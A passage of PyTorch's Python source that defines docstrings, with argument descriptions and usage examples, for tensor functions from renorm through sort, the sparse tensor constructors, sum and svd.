:func:`torch.fmod` which just computes the modulus for integer inputs and
applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point inputs.
""".format(**common_args))
add_docstr(torch.renorm,
r"""
renorm(input, p, dim, maxnorm, *, out=None) -> Tensor
Returns a tensor where each sub-tensor of :attr:`input` along dimension
:attr:`dim` is normalized such that the `p`-norm of the sub-tensor is lower
than the value :attr:`maxnorm`
.. note:: If the norm of a row is lower than `maxnorm`, the row is unchanged
Args:
{input}
p (float): the power for the norm computation
dim (int): the dimension to slice over to get the sub-tensors
maxnorm (float): the maximum norm to keep each sub-tensor under
Keyword args:
{out}
Example::
>>> x = torch.ones(3, 3)
>>> x[1].fill_(2)
tensor([ 2., 2., 2.])
>>> x[2].fill_(3)
tensor([ 3., 3., 3.])
>>> x
tensor([[ 1., 1., 1.],
[ 2., 2., 2.],
[ 3., 3., 3.]])
>>> torch.renorm(x, 1, 0, 5)
tensor([[ 1.0000, 1.0000, 1.0000],
[ 1.6667, 1.6667, 1.6667],
[ 1.6667, 1.6667, 1.6667]])
""".format(**common_args))
add_docstr(torch.reshape,
r"""
reshape(input, shape) -> Tensor
Returns a tensor with the same data and number of elements as :attr:`input`,
but with the specified shape. When possible, the returned tensor will be a view
of :attr:`input`. Otherwise, it will be a copy. Contiguous inputs and inputs
with compatible strides can be reshaped without copying, but you should not
depend on the copying vs. viewing behavior.
See :meth:`torch.Tensor.view` on when it is possible to return a view.
A single dimension may be -1, in which case it's inferred from the remaining
dimensions and the number of elements in :attr:`input`.
Args:
input (Tensor): the tensor to be reshaped
shape (tuple of ints): the new shape
Example::
>>> a = torch.arange(4.)
>>> torch.reshape(a, (2, 2))
tensor([[ 0., 1.],
[ 2., 3.]])
>>> b = torch.tensor([[0, 1], [2, 3]])
>>> torch.reshape(b, (-1,))
tensor([ 0, 1, 2, 3])
""")
add_docstr(torch.result_type,
r"""
result_type(tensor1, tensor2) -> dtype
Returns the :class:`torch.dtype` that would result from performing an arithmetic
operation on the provided input tensors. See type promotion :ref:`documentation <type-promotion-doc>`
for more information on the type promotion logic.
Args:
tensor1 (Tensor or Number): an input tensor or number
tensor2 (Tensor or Number): an input tensor or number
Example::
>>> torch.result_type(torch.tensor([1, 2], dtype=torch.int), 1.0)
torch.float32
>>> torch.result_type(torch.tensor([1, 2], dtype=torch.uint8), torch.tensor(1))
torch.uint8
""")
add_docstr(torch.row_stack,
r"""
row_stack(tensors, *, out=None) -> Tensor
Alias of :func:`torch.vstack`.
""")
add_docstr(torch.round,
r"""
round(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input` rounded
to the closest integer.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.9920, 0.6077, 0.9734, -1.0362])
>>> torch.round(a)
tensor([ 1., 1., 1., -1.])
""".format(**common_args))
add_docstr(torch.rsqrt,
r"""
rsqrt(input, *, out=None) -> Tensor
Returns a new tensor with the reciprocal of the square-root of each of
the elements of :attr:`input`.
.. math::
\text{out}_{i} = \frac{1}{\sqrt{\text{input}_{i}}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.0370, 0.2970, 1.5420, -0.9105])
>>> torch.rsqrt(a)
tensor([ nan, 1.8351, 0.8053, nan])
""".format(**common_args))
add_docstr(torch.scatter,
r"""
scatter(input, dim, index, src) -> Tensor
Out-of-place version of :meth:`torch.Tensor.scatter_`
""")
add_docstr(torch.scatter_add,
r"""
scatter_add(input, dim, index, src) -> Tensor
Out-of-place version of :meth:`torch.Tensor.scatter_add_`
""")
add_docstr(torch.select,
r"""
select(input, dim, index) -> Tensor
Slices the :attr:`input` tensor along the selected dimension at the given index.
This function returns a view of the original tensor with the given dimension removed.
Args:
{input} (Tensor)
dim (int): the dimension to slice
index (int): the index to select with
.. note::
:meth:`select` is equivalent to slicing. For example,
``tensor.select(0, index)`` is equivalent to ``tensor[index]`` and
``tensor.select(2, index)`` is equivalent to ``tensor[:,:,index]``.
""")
add_docstr(torch.select_scatter,
r"""
select_scatter(input, src, dim, index) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` at the given index.
This function returns a tensor with fresh storage; it does not create a view.
Args:
{input} (Tensor)
src (Tensor): The tensor to embed into :attr:`input`
dim (int): the dimension to insert the slice into.
index (int): the index to select with
.. note::
:attr:`src` must be of the proper size in order to be embedded
into :attr:`input`. Specifically, it should have the same shape as
``torch.select(input, dim, index)``
Example::
>>> a = torch.zeros(2, 2)
>>> b = torch.ones(2)
>>> a.select_scatter(b, 0, 0)
tensor([[1., 1.],
[0., 0.]])
""")
add_docstr(torch.slice_scatter,
r"""
slice_scatter(input, src, dim=0, start=None, end=None, step=1) -> Tensor
Embeds the values of the :attr:`src` tensor into :attr:`input` at the given
dimension.
This function returns a tensor with fresh storage; it does not create a view.
Args:
{input} (Tensor)
src (Tensor): The tensor to embed into :attr:`input`
dim (int): the dimension to insert the slice into
start (Optional[int]): the start index of where to insert the slice
end (Optional[int]): the end index of where to insert the slice
step (int): the how many elements to skip in
Example::
>>> a = torch.zeros(8, 8)
>>> b = torch.ones(8)
>>> a.slice_scatter(b, start=6)
tensor([[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.],
[1., 1., 1., 1., 1., 1., 1., 1.],
[1., 1., 1., 1., 1., 1., 1., 1.]])
>>> b = torch.ones(2)
>>> a.slice_scatter(b, dim=1, start=2, end=6, step=2)
tensor([[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.],
[0., 0., 1., 0., 1., 0., 0., 0.]])
""")
add_docstr(torch.set_flush_denormal,
r"""
set_flush_denormal(mode) -> bool
Disables denormal floating numbers on CPU.
Returns ``True`` if your system supports flushing denormal numbers and it
successfully configures flush denormal mode. :meth:`~torch.set_flush_denormal`
is only supported on x86 architectures supporting SSE3.
Args:
mode (bool): Controls whether to enable flush denormal mode or not
Example::
>>> torch.set_flush_denormal(True)
True
>>> torch.tensor([1e-323], dtype=torch.float64)
tensor([ 0.], dtype=torch.float64)
>>> torch.set_flush_denormal(False)
True
>>> torch.tensor([1e-323], dtype=torch.float64)
tensor(9.88131e-324 *
[ 1.0000], dtype=torch.float64)
""")
add_docstr(torch.set_num_threads, r"""
set_num_threads(int)
Sets the number of threads used for intraop parallelism on CPU.
.. warning::
To ensure that the correct number of threads is used, set_num_threads
must be called before running eager, JIT or autograd code.
""")
add_docstr(torch.set_num_interop_threads, r"""
set_num_interop_threads(int)
Sets the number of threads used for interop parallelism
(e.g. in JIT interpreter) on CPU.
.. warning::
Can only be called once and before any inter-op parallel work
is started (e.g. JIT execution).
""")
add_docstr(torch.sigmoid, r"""
sigmoid(input, *, out=None) -> Tensor
Alias for :func:`torch.special.expit`.
""")
add_docstr(torch.logit,
r"""
logit(input, eps=None, *, out=None) -> Tensor
Alias for :func:`torch.special.logit`.
""")
add_docstr(torch.sign,
r"""
sign(input, *, out=None) -> Tensor
Returns a new tensor with the signs of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \operatorname{sgn}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([0.7, -1.2, 0., 2.3])
>>> a
tensor([ 0.7000, -1.2000, 0.0000, 2.3000])
>>> torch.sign(a)
tensor([ 1., -1., 0., 1.])
""".format(**common_args))
add_docstr(torch.signbit,
r"""
signbit(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` has its sign bit set (is less than zero) or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([0.7, -1.2, 0., 2.3])
>>> torch.signbit(a)
tensor([ False, True, False, False])
""".format(**common_args))
add_docstr(torch.sgn,
r"""
sgn(input, *, out=None) -> Tensor
This function is an extension of torch.sign() to complex tensors.
It computes a new tensor whose elements have
the same angles as the corresponding elements of :attr:`input` and
absolute values (i.e. magnitudes) of one for complex tensors and
is equivalent to torch.sign() for non-complex tensors.
.. math::
\text{out}_{i} = \begin{cases}
0 & |\text{{input}}_i| == 0 \\
\frac{{\text{{input}}_i}}{|{\text{{input}}_i}|} & \text{otherwise}
\end{cases}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> t = torch.tensor([3+4j, 7-24j, 0, 1+2j])
>>> t.sgn()
tensor([0.6000+0.8000j, 0.2800-0.9600j, 0.0000+0.0000j, 0.4472+0.8944j])
""".format(**common_args))
add_docstr(torch.sin,
r"""
sin(input, *, out=None) -> Tensor
Returns a new tensor with the sine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sin(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.5461, 0.1347, -2.7266, -0.2746])
>>> torch.sin(a)
tensor([-0.5194, 0.1343, -0.4032, -0.2711])
""".format(**common_args))
add_docstr(torch.sinc,
r"""
sinc(input, *, out=None) -> Tensor
Alias for :func:`torch.special.sinc`.
""")
add_docstr(torch.sinh,
r"""
sinh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic sine of the elements of
:attr:`input`.
.. math::
\text{out}_{i} = \sinh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.5380, -0.8632, -0.1265, 0.9399])
>>> torch.sinh(a)
tensor([ 0.5644, -0.9744, -0.1268, 1.0845])
.. note::
When :attr:`input` is on the CPU, the implementation of torch.sinh may use
the Sleef library, which rounds very large results to infinity or negative
infinity. See `here <https://sleef.org/purec.xhtml>`_ for details.
""".format(**common_args))
add_docstr(torch.sort,
r"""
sort(input, dim=-1, descending=False, stable=False, *, out=None) -> (Tensor, LongTensor)
Sorts the elements of the :attr:`input` tensor along a given dimension
in ascending order by value.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`descending` is ``True`` then the elements are sorted in descending
order by value.
If :attr:`stable` is ``True`` then the sorting routine becomes stable, preserving
the order of equivalent elements.
A namedtuple of (values, indices) is returned, where the `values` are the
sorted values and `indices` are the indices of the elements in the original
`input` tensor.
Args:
{input}
dim (int, optional): the dimension to sort along
descending (bool, optional): controls the sorting order (ascending or descending)
stable (bool, optional): makes the sorting routine stable, which guarantees that the order
of equivalent elements is preserved.
Keyword args:
out (tuple, optional): the output tuple of (`Tensor`, `LongTensor`) that can
be optionally given to be used as output buffers
Example::
>>> x = torch.randn(3, 4)
>>> sorted, indices = torch.sort(x)
>>> sorted
tensor([[-0.2162, 0.0608, 0.6719, 2.3332],
[-0.5793, 0.0061, 0.6058, 0.9497],
[-0.5071, 0.3343, 0.9553, 1.0960]])
>>> indices
tensor([[ 1, 0, 2, 3],
[ 3, 1, 0, 2],
[ 0, 3, 1, 2]])
>>> sorted, indices = torch.sort(x, 0)
>>> sorted
tensor([[-0.5071, -0.2162, 0.6719, -0.5793],
[ 0.0608, 0.0061, 0.9497, 0.3343],
[ 0.6058, 0.9553, 1.0960, 2.3332]])
>>> indices
tensor([[ 2, 0, 0, 1],
[ 0, 1, 1, 2],
[ 1, 2, 2, 0]])
>>> x = torch.tensor([0, 1] * 9)
>>> x.sort()
torch.return_types.sort(
values=tensor([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
indices=tensor([ 2, 16, 4, 6, 14, 8, 0, 10, 12, 9, 17, 15, 13, 11, 7, 5, 3, 1]))
>>> x.sort(stable=True)
torch.return_types.sort(
values=tensor([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1]),
indices=tensor([ 0, 2, 4, 6, 8, 10, 12, 14, 16, 1, 3, 5, 7, 9, 11, 13, 15, 17]))
""".format(**common_args))
add_docstr(torch.argsort,
r"""
argsort(input, dim=-1, descending=False) -> LongTensor
Returns the indices that sort a tensor along a given dimension in ascending
order by value.
This is the second value returned by :meth:`torch.sort`. See its documentation
for the exact semantics of this method.
Args:
{input}
dim (int, optional): the dimension to sort along
descending (bool, optional): controls the sorting order (ascending or descending)
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.0785, 1.5267, -0.8521, 0.4065],
[ 0.1598, 0.0788, -0.0745, -1.2700],
[ 1.2208, 1.0722, -0.7064, 1.2564],
[ 0.0669, -0.2318, -0.8229, -0.9280]])
>>> torch.argsort(a, dim=1)
tensor([[2, 0, 3, 1],
[3, 2, 1, 0],
[2, 1, 0, 3],
[3, 2, 1, 0]])
""".format(**common_args))
add_docstr(torch.msort,
r"""
msort(input, *, out=None) -> Tensor
Sorts the elements of the :attr:`input` tensor along its first dimension
in ascending order by value.
.. note:: `torch.msort(t)` is equivalent to `torch.sort(t, dim=0)[0]`.
See also :func:`torch.sort`.
Args:
{input}
Keyword args:
{out}
Example::
>>> t = torch.randn(3, 4)
>>> t
tensor([[-0.1321, 0.4370, -1.2631, -1.1289],
[-2.0527, -1.1250, 0.2275, 0.3077],
[-0.0881, -0.1259, -0.5495, 1.0284]])
>>> torch.msort(t)
tensor([[-2.0527, -1.1250, -1.2631, -1.1289],
[-0.1321, -0.1259, -0.5495, 0.3077],
[-0.0881, 0.4370, 0.2275, 1.0284]])
""".format(**common_args))
add_docstr(torch.sparse_csr_tensor,
r"""
sparse_csr_tensor(crow_indices, col_indices, values, size=None, *, dtype=None, device=None, requires_grad=False) -> Tensor
Constructs a :ref:`sparse tensor in CSR (Compressed Sparse Row) <sparse-csr-docs>` with specified
values at the given :attr:`crow_indices` and :attr:`col_indices`. Sparse matrix multiplication operations
in CSR format are typically faster than that for sparse tensors in COO format. Make you have a look
at :ref:`the note on the data type of the indices <sparse-csr-docs>`.
Args:
crow_indices (array_like): One-dimensional array of size size[0] + 1. The last element
is the number of non-zeros. This tensor encodes the index in values and col_indices
depending on where the given row starts. Each successive number in the tensor
subtracted by the number before it denotes the number of elements in a given row.
col_indices (array_like): Column co-ordinates of each element in values. Strictly one
dimensional tensor with the same length as values.
values (array_list): Initial values for the tensor. Can be a list, tuple, NumPy ``ndarray``, scalar,
and other types.
size (list, tuple, :class:`torch.Size`, optional): Size of the sparse tensor. If not provided, the
size will be inferred as the minimum size big enough to hold all non-zero elements.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if None, infers data type from :attr:`values`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if None, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
{requires_grad}
Example ::
>>> crow_indices = [0, 2, 4]
>>> col_indices = [0, 1, 0, 1]
>>> values = [1, 2, 3, 4]
>>> torch.sparse_csr_tensor(torch.tensor(crow_indices, dtype=torch.int64),
... torch.tensor(col_indices, dtype=torch.int64),
... torch.tensor(values), dtype=torch.double)
tensor(crow_indices=tensor([0, 2, 4]),
col_indices=tensor([0, 1, 0, 1]),
values=tensor([1., 2., 3., 4.]), size=(2, 2), nnz=4,
dtype=torch.float64, layout=torch.sparse_csr)
""".format(**factory_common_args))
add_docstr(torch.sparse_coo_tensor,
r"""
sparse_coo_tensor(indices, values, size=None, *, dtype=None, device=None, requires_grad=False) -> Tensor
Constructs a :ref:`sparse tensor in COO(rdinate) format
<sparse-coo-docs>` with specified values at the given
:attr:`indices`.
.. note::
This function returns an :ref:`uncoalesced tensor <sparse-uncoalesced-coo-docs>`.
Args:
indices (array_like): Initial data for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types. Will be cast to a :class:`torch.LongTensor`
internally. The indices are the coordinates of the non-zero values in the matrix, and thus
should be two-dimensional where the first dimension is the number of tensor dimensions and
the second dimension is the number of non-zero values.
values (array_like): Initial values for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types.
size (list, tuple, or :class:`torch.Size`, optional): Size of the sparse tensor. If not
provided the size will be inferred as the minimum size big enough to hold all non-zero
elements.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if None, infers data type from :attr:`values`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if None, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
{requires_grad}
Example::
>>> i = torch.tensor([[0, 1, 1],
... [2, 0, 2]])
>>> v = torch.tensor([3, 4, 5], dtype=torch.float32)
>>> torch.sparse_coo_tensor(i, v, [2, 4])
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
size=(2, 4), nnz=3, layout=torch.sparse_coo)
>>> torch.sparse_coo_tensor(i, v) # Shape inference
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
size=(2, 3), nnz=3, layout=torch.sparse_coo)
>>> torch.sparse_coo_tensor(i, v, [2, 4],
... dtype=torch.float64,
... device=torch.device('cuda:0'))
tensor(indices=tensor([[0, 1, 1],
[2, 0, 2]]),
values=tensor([3., 4., 5.]),
device='cuda:0', size=(2, 4), nnz=3, dtype=torch.float64,
layout=torch.sparse_coo)
# Create an empty sparse tensor with the following invariants:
# 1. sparse_dim + dense_dim = len(SparseTensor.shape)
# 2. SparseTensor._indices().shape = (sparse_dim, nnz)
# 3. SparseTensor._values().shape = (nnz, SparseTensor.shape[sparse_dim:])
#
# For instance, to create an empty sparse tensor with nnz = 0, dense_dim = 0 and
# sparse_dim = 1 (hence indices is a 2D tensor of shape = (1, 0))
>>> S = torch.sparse_coo_tensor(torch.empty([1, 0]), [], [1])
tensor(indices=tensor([], size=(1, 0)),
values=tensor([], size=(0,)),
size=(1,), nnz=0, layout=torch.sparse_coo)
# and to create an empty sparse tensor with nnz = 0, dense_dim = 1 and
# sparse_dim = 1
>>> S = torch.sparse_coo_tensor(torch.empty([1, 0]), torch.empty([0, 2]), [1, 2])
tensor(indices=tensor([], size=(1, 0)),
values=tensor([], size=(0, 2)),
size=(1, 2), nnz=0, layout=torch.sparse_coo)
.. _torch.sparse: https://pytorch.org/docs/stable/sparse.html
""".format(**factory_common_args))
add_docstr(torch.sqrt,
r"""
sqrt(input, *, out=None) -> Tensor
Returns a new tensor with the square-root of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \sqrt{\text{input}_{i}}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-2.0755, 1.0226, 0.0831, 0.4806])
>>> torch.sqrt(a)
tensor([ nan, 1.0112, 0.2883, 0.6933])
""".format(**common_args))
add_docstr(torch.square,
r"""
square(input, *, out=None) -> Tensor
Returns a new tensor with the square of the elements of :attr:`input`.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-2.0755, 1.0226, 0.0831, 0.4806])
>>> torch.square(a)
tensor([ 4.3077, 1.0457, 0.0069, 0.2310])
""".format(**common_args))
add_docstr(torch.squeeze,
r"""
squeeze(input, dim=None, *, out=None) -> Tensor
Returns a tensor with all the dimensions of :attr:`input` of size `1` removed.
For example, if `input` is of shape:
:math:`(A \times 1 \times B \times C \times 1 \times D)` then the `out` tensor
will be of shape: :math:`(A \times B \times C \times D)`.
When :attr:`dim` is given, a squeeze operation is done only in the given
dimension. If `input` is of shape: :math:`(A \times 1 \times B)`,
``squeeze(input, 0)`` leaves the tensor unchanged, but ``squeeze(input, 1)``
will squeeze the tensor to the shape :math:`(A \times B)`.
.. note:: The returned tensor shares the storage with the input tensor,
so changing the contents of one will change the contents of the other.
.. warning:: If the tensor has a batch dimension of size 1, then `squeeze(input)`
will also remove the batch dimension, which can lead to unexpected
errors.
Args:
{input}
dim (int, optional): if given, the input will be squeezed only in
this dimension
Keyword args:
{out}
Example::
>>> x = torch.zeros(2, 1, 2, 1, 2)
>>> x.size()
torch.Size([2, 1, 2, 1, 2])
>>> y = torch.squeeze(x)
>>> y.size()
torch.Size([2, 2, 2])
>>> y = torch.squeeze(x, 0)
>>> y.size()
torch.Size([2, 1, 2, 1, 2])
>>> y = torch.squeeze(x, 1)
>>> y.size()
torch.Size([2, 2, 1, 2])
""".format(**common_args))
add_docstr(torch.std, r"""
std(input, dim, unbiased, keepdim=False, *, out=None) -> Tensor
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
.. function:: std(input, unbiased) -> Tensor
:noindex:
Calculates the standard deviation of all elements in the :attr:`input` tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.std(a, unbiased=False)
tensor(0.4188)
""".format(**multi_dim_common))
add_docstr(torch.std_mean,
r"""
std_mean(input, dim, unbiased, keepdim=False, *, out=None) -> (Tensor, Tensor)
If :attr:`unbiased` is ``True``, Bessel's correction will be used to calculate
the standard deviation. Otherwise, the sample deviation is calculated, without
any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
Returns:
A tuple (std, mean) containing the standard deviation and mean.
.. function:: std_mean(input, unbiased) -> (Tensor, Tensor)
:noindex:
Calculates the standard deviation and mean of all elements in the :attr:`input`
tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Returns:
A tuple (std, mean) containing the standard deviation and mean.
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.std_mean(a, unbiased=False)
(tensor(0.4188), tensor(-0.8509))
""".format(**multi_dim_common))
add_docstr(torch.sub, r"""
sub(input, other, *, alpha=1, out=None) -> Tensor
Subtracts :attr:`other`, scaled by :attr:`alpha`, from :attr:`input`.
.. math::
\text{{out}}_i = \text{{input}}_i - \text{{alpha}} \times \text{{other}}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number): the tensor or number to subtract from :attr:`input`.
Keyword args:
alpha (Number): the multiplier for :attr:`other`.
{out}
Example::
>>> a = torch.tensor((1, 2))
>>> b = torch.tensor((0, 1))
>>> torch.sub(a, b, alpha=2)
tensor([1, 0])
""".format(**common_args))
add_docstr(torch.subtract, r"""
subtract(input, other, *, alpha=1, out=None) -> Tensor
Alias for :func:`torch.sub`.
""")
add_docstr(torch.sum,
r"""
sum(input, *, dtype=None) -> Tensor
Returns the sum of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[ 0.1133, -0.9567, 0.2958]])
>>> torch.sum(a)
tensor(-0.5475)
.. function:: sum(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the sum of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`. If :attr:`dim` is a list of dimensions,
reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(4, 4)
>>> a
tensor([[ 0.0569, -0.2475, 0.0737, -0.3429],
[-0.2993, 0.9138, 0.9337, -1.6864],
[ 0.1132, 0.7892, -0.1003, 0.5688],
[ 0.3637, -0.9906, -0.4752, -1.5197]])
>>> torch.sum(a, 1)
tensor([-0.4598, -0.1381, 1.3708, -2.6217])
>>> b = torch.arange(4 * 5 * 6).view(4, 5, 6)
>>> torch.sum(b, (2, 1))
tensor([ 435., 1335., 2235., 3135.])
""".format(**multi_dim_common))
add_docstr(torch.nansum,
r"""
nansum(input, *, dtype=None) -> Tensor
Returns the sum of all elements, treating Not a Numbers (NaNs) as zero.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.tensor([1., 2., float('nan'), 4.])
>>> torch.nansum(a)
tensor(7.)
.. function:: nansum(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the sum of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`, treating Not a Numbers (NaNs) as zero.
If :attr:`dim` is a list of dimensions, reduce over all of them.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> torch.nansum(torch.tensor([1., float("nan")]))
1.0
>>> a = torch.tensor([[1, 2], [3., float("nan")]])
>>> torch.nansum(a)
tensor(6.)
>>> torch.nansum(a, dim=0)
tensor([4., 2.])
>>> torch.nansum(a, dim=1)
tensor([3., 3.])
""".format(**multi_dim_common))
add_docstr(torch.svd,
r"""
svd(input, some=True, compute_uv=True, *, out=None) -> (Tensor, Tensor, Tensor)
Computes the singular value decomposition of either a matrix or batch of
matrices :attr:`input`. The singular value decomposition is represented as a
namedtuple `(U, S, V)`, such that :attr:`input` :math:`= U \text{diag}(S) V^{\text{H}}`.
where :math:`V^{\text{H}}` is the transpose of `V` for real inputs,
and the conjugate transpose of `V` for complex inputs.
If :attr:`input` is a batch of matrices, then `U`, `S`, and `V` are also
batched with the same batch dimensions as :attr:`input`.
If :attr:`some` is `True` (default), the method returns the reduced singular
value decomposition. In this case, if the last two dimensions of :attr:`input` are
`m` and `n`, then the returned `U` and `V` matrices will contain only
`min(n, m)` orthonormal columns.
If :attr:`compute_uv` is `False`, the returned `U` and `V` will be
zero-filled matrices of shape `(m, m)` and `(n, n)`
respectively, and the same device as :attr:`input`. The argument :attr:`some`
has no effect when :attr:`compute_uv` is `False`.
Supports :attr:`input` of float, double, cfloat and cdouble data types.
The dtypes of `U` and `V` are the same as :attr:`input`'s. `S` will
always be real-valued, even if :attr:`input` is complex.
.. warning::
:func:`torch.svd` is deprecated in favor of :func:`torch.linalg.svd`
and will be removed in a future PyTorch release.
``U, S, V = torch.svd(A, some=some, compute_uv=True)`` (default) should be replaced with
.. code:: python
U, S, Vh = torch.linalg.svd(A, full_matrices=not some)
V = Vh.mH
``_, S, _ = torch.svd(A, some=some, compute_uv=False)`` should be replaced with
.. code:: python
S = torch.svdvals(A)
.. note:: Differences with :func:`torch.linalg.svd`:
* :attr:`some` is the opposite of
:func:`torch.linalg.svd`'s :attr:`full_matrices`. Note that
default value for both is `True`, so the default behavior is
effectively the opposite.
* :func:`torch.svd` returns `V`, whereas :func:`torch.linalg.svd` returns
`Vh`, that is, :math:`V^{\text{H}}`.
* If :attr:`compute_uv` is `False`, :func:`torch.svd` returns zero-filled
tensors for `U` and `Vh`, whereas :func:`torch.linalg.svd` returns
empty tensors.
.. note:: The singular values are returned in descending order. If :attr:`input` is a batch of matrices,
then the singular values of each matrix in the batch are returned in descending order.
.. note:: The `S` tensor can only be used to compute gradients if :attr:`compute_uv` is `True`.
.. note:: When :attr:`some` is `False`, the gradients on `U[..., :, min(m, n):]`
and `V[..., :, min(m, n):]` will be ignored in the backward pass, as those vectors
can be arbitrary bases of the corresponding subspaces.
.. note:: The implementation of :func:`torch.linalg.svd` on CPU uses LAPACK's routine `?gesdd`
(a divide-and-conquer algorithm) instead of `?gesvd` for speed. Analogously,
on GPU, it uses cuSOLVER's routines `gesvdj` and `gesvdjBatched` on CUDA 10.1.243
and later, and MAGMA's routine `gesdd` on earlier versions of CUDA.
.. note:: The returned `U` will not be contiguous. The matrix (or batch of matrices) will
be represented as a column-major matrix (i.e. Fortran-contiguous).
.. warning:: The gradients with respect to `U` and `V` will only be finite when the input does not
have zero nor repeated singular values.
.. warning:: If the distance between any two singular values is close to zero, the gradients with respect to
`U` and `V` will be numerically unstable, as they depends on
:math:`\frac{1}{\min_{i \neq j} \sigma_i^2 - \sigma_j^2}`. The same happens when the matrix
has small singular values, as these gradients also depend on `S⁻¹`.
.. warning:: For complex-valued :attr:`input` the singular value decomposition is not unique,
as `U` and `V` may be multiplied by an arbitrary phase factor :math:`e^{i \phi}` on every column.
The same happens when :attr:`input` has repeated singular values, where one may multiply
the columns of the spanning subspace in `U` and `V` by a rotation matrix
and `the resulting vectors will span the same subspace`_.
Different platforms, like NumPy, or inputs on different device types,
may produce different `U` and `V` tensors.
Args:
input (Tensor): the input tensor of size `(*, m, n)` where `*` is zero or more
batch dimensions consisting of `(m, n)` matrices.
some (bool, optional): controls whether to compute the reduced or full decomposition, and
consequently, the shape of returned `U` and `V`. Default: `True`.
compute_uv (bool, optional): controls whether to compute `U` and `V`. Default: `True`.
Keyword args:
out (tuple, optional): the output tuple of tensors
Example::
>>> a = torch.randn(5, 3)
>>> a
tensor([[ 0.2364, -0.7752, 0.6372],
[ 1.7201, 0.7394, -0.0504],
[-0.3371, -1.0584, 0.5296],
[ 0.3550, -0.4022, 1.5569],
[ 0.2445, -0.0158, 1.1414]])
>>> u, s, v = torch.svd(a)
>>> u
tensor([[ 0.4027, 0.0287, 0.5434],
[-0.1946, 0.8833, 0.3679],
[ 0.4296, -0.2890, 0.5261],
[ 0.6604, 0.2717, -0.2618],
[ 0.4234, 0.2481, -0.4733]])
